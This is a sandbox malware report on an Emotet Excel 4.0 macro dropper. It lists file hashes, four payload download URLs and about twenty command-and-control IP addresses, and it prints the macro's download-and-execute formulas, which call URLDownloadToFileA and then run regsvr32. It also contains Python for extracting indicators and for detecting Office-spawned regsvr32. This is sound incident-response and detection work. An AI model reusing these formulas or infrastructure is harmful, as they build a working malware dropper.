General

  • Target

    pack 7530987.xlsm

  • Size

    228KB

  • Sample

    221118-deg3gacc8s

  • MD5

    0be38d7e3fe5fc3a79a597ed1d254a50

  • SHA1

    f4eb84f6b1297f57e57780aa7fcabe6438880d40

  • SHA256

    da644b867f32f4c76681fd2a7838d843f447f06f87a5ea98786031f0caf169cc

  • SHA512

    e589d28f3394e198fd8cebf453952973c6967922b171d4f997499d78dd297ee62567418ce621b84848aa1d9d7e4258bd12b287de198a456b70450775b94f81b2

  • SSDEEP

    6144:9w2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyO:9w2LDHf9PH5XUqRLTyO

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

httph.com/nutabalong/CfyFMHWntM3t/

https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/

http://bet-invest.com/mail/nui/

https://www.manchesterot.co.uk/about-us/KEfGo/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"httph.com/nutabalong/CfyFMHWntM3t/","..\oxnv1.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/","..\oxnv2.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bet-invest.com/mail/nui/","..\oxnv3.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/KEfGo/","..\oxnv4.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx")
    =RETURN()
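The formulas above are a plain download-and-execute chain: each CALL into urlmon!URLDownloadToFileA fetches one URL into the parent directory under a non-DLL extension, and the EXEC that follows hands that file to regsvr32.exe /S. The Python below is an added example, not sandbox output: it splits the flattened formula string on formula boundaries, pairs every download with the EXEC that loads it, and flags URLs that carry no scheme (as the first one in this sample does). The formula text is copied from the report; the function names and regular expressions are mine.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Formula text as it appears in the "formulas" attribute above, joined into one
# string the way the extractor emitted it.
FORMULAS = " ".join([
    r'=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"httph.com/nutabalong/CfyFMHWntM3t/","..\oxnv1.ooccxx",0,0)',
    r'=EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx")',
    r'=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/","..\oxnv2.ooccxx",0,0)',
    r'=EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx")',
    r'=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bet-invest.com/mail/nui/","..\oxnv3.ooccxx",0,0)',
    r'=EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx")',
    r'=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/KEfGo/","..\oxnv4.ooccxx",0,0)',
    r'=EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx")',
    r'=RETURN()',
])

# Every formula starts with "=NAME("; split on that boundary rather than on
# whitespace, because the EXEC command lines themselves contain spaces.
FORMULA_BOUNDARY = re.compile(r'\s*(?==[A-Z][A-Z0-9.]*\()')
DOWNLOAD_RE = re.compile(
    r'=CALL\("urlmon","URLDownloadToFileA","[A-Z]+",0,"(?P<url>[^"]*)","(?P<path>[^"]*)"')
EXEC_RE = re.compile(r'=EXEC\("(?P<cmd>[^"]*)"\)')


@dataclass
class Stage:
    url: str
    dropped_path: str
    exec_cmd: Optional[str] = None

    @property
    def scheme(self) -> str:
        # Empty when the macro passes a bare host/path to URLDownloadToFileA.
        return urlsplit(self.url).scheme

    @property
    def loader(self) -> Optional[str]:
        # First token of the EXEC command, e.g. the regsvr32.exe path.
        return self.exec_cmd.split()[0] if self.exec_cmd else None


def split_formulas(text: str) -> List[str]:
    return [f for f in FORMULA_BOUNDARY.split(text) if f]


def extract_chain(text: str) -> List[Stage]:
    """Pair each URLDownloadToFileA call with the EXEC that runs its output."""
    stages: List[Stage] = []
    by_basename: Dict[str, Stage] = {}
    for formula in split_formulas(text):
        m = DOWNLOAD_RE.match(formula)
        if m:
            stage = Stage(m["url"], m["path"])
            stages.append(stage)
            by_basename[m["path"].rsplit("\\", 1)[-1]] = stage
            continue
        m = EXEC_RE.match(formula)
        if m:
            # An EXEC belongs to whichever dropped file name its command mentions.
            for name, stage in by_basename.items():
                if name in m["cmd"]:
                    stage.exec_cmd = m["cmd"]
    return stages


def iocs(stages: List[Stage]) -> Dict[str, List[str]]:
    """Network and host indicators a responder would block or hunt for."""
    return {
        "urls": [s.url for s in stages],
        "schemeless_urls": [s.url for s in stages if not s.scheme],
        "dropped_files": [s.dropped_path.rsplit("\\", 1)[-1] for s in stages],
        "loaders": sorted({s.loader for s in stages if s.loader}),
    }


if __name__ == "__main__":
    for stage in extract_chain(FORMULAS):
        print(f"{stage.url!r:60} -> {stage.dropped_path:18} -> {stage.exec_cmd}")
    print(iocs(extract_chain(FORMULAS)))
```

The pairing is by dropped file name rather than by formula order, so it still holds if the sheet interleaves the CALL and EXEC cells differently from how the extractor listed them.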

Extracted

Language
xlm4.0

Source          URL
xlm40.dropper   httph.com/nutabalong/CfyFMHWntM3t/
xlm40.dropper   https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/
xlm40.dropper   http://bet-invest.com/mail/nui/
xlm40.dropper   https://www.manchesterot.co.uk/about-us/KEfGo/

Extracted

Family

emotet

Botnet

Epoch5

C2

178.238.225.252:8080

139.196.72.155:8080

36.67.23.59:443

103.56.149.105:8080

37.44.244.177:8080

85.25.120.45:8080

202.134.4.210:7080

78.47.204.80:443

83.229.80.93:8080

93.104.209.107:8080

80.211.107.116:8080

165.22.254.236:8080

104.244.79.94:443

185.148.169.10:8080

190.145.8.4:443

175.126.176.79:8080

139.59.80.108:8080

188.165.79.151:443

128.199.217.206:443

64.227.55.231:8080

ecs1.plain
eck1.plain

Targets

    • Target

      pack 7530987.xlsm

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Downloads MZ/PE file

    • Loads dropped DLL

    • Adds Run key to start application
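The "Process spawned unexpected child process" and "Loads dropped DLL" signatures above reduce to one process-creation pattern: EXCEL.EXE starting regsvr32.exe with /S and a module argument that is a relative path with a non-DLL extension. The Python below is an added detection example (not the sandbox's rule) run over constructed Sysmon-style process events: the first event carries the exact command line from this report, the second is a benign installer registration that must not alert, and the third is an Office parent starting cmd.exe. Field names, the parent and child lists, and the reason strings are my assumptions.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List

# Assumed allow/deny sets; tune to the environment.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBIN_CHILDREN = {"regsvr32.exe", "rundll32.exe", "cmd.exe", "powershell.exe",
                   "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe"}
MODULE_EXTS = {".dll", ".ocx", ".ax"}
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')

# Constructed process-creation events (Sysmon event 1 field names), not sandbox output.
EVENTS = [
    {"id": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx"},
    {"id": 2,
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"id": 3,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo hi"},
]


@dataclass
class Finding:
    event_id: int
    reasons: List[str]


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [quoted if quoted else bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def regsvr32_targets(cmdline: str) -> List[str]:
    """Arguments regsvr32 treats as modules: everything after the image that is not a switch."""
    return [t for t in tokens(cmdline)[1:] if not t.startswith(("/", "-"))]


def is_absolute(path: str) -> bool:
    return bool(re.match(r"^[A-Za-z]:\\", path)) or path.startswith("\\\\")


def analyse(event: dict) -> List[str]:
    reasons: List[str] = []
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    if parent in OFFICE_PARENTS and child in LOLBIN_CHILDREN:
        reasons.append(f"{parent} spawned {child}")
    if child == "regsvr32.exe":
        if any(t.lower() == "/s" for t in tokens(event["CommandLine"])):
            reasons.append("silent flag")  # suppresses the DllRegisterServer dialog
        for module in regsvr32_targets(event["CommandLine"]):
            if ntpath.splitext(module)[1].lower() not in MODULE_EXTS:
                reasons.append("non-DLL extension")
            if not is_absolute(module):
                reasons.append("relative module path")
    return reasons


def detect(events: List[dict]) -> List[Finding]:
    findings = []
    for event in events:
        reasons = analyse(event)
        # /s on its own is ordinary installer behaviour; alert only when it comes
        # with an Office parent or an odd module argument.
        if any(r != "silent flag" for r in reasons):
            findings.append(Finding(event["id"], reasons))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding.event_id, "; ".join(finding.reasons))
```

The module-argument checks are what separate this sample from legitimate COM registrations: an installer passes an absolute path to a .dll, while the macro passes ..\oxnv1.ooccxx, a relative path whose extension no DLL would normally carry.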

MITRE ATT&CK Enterprise v6

Tasks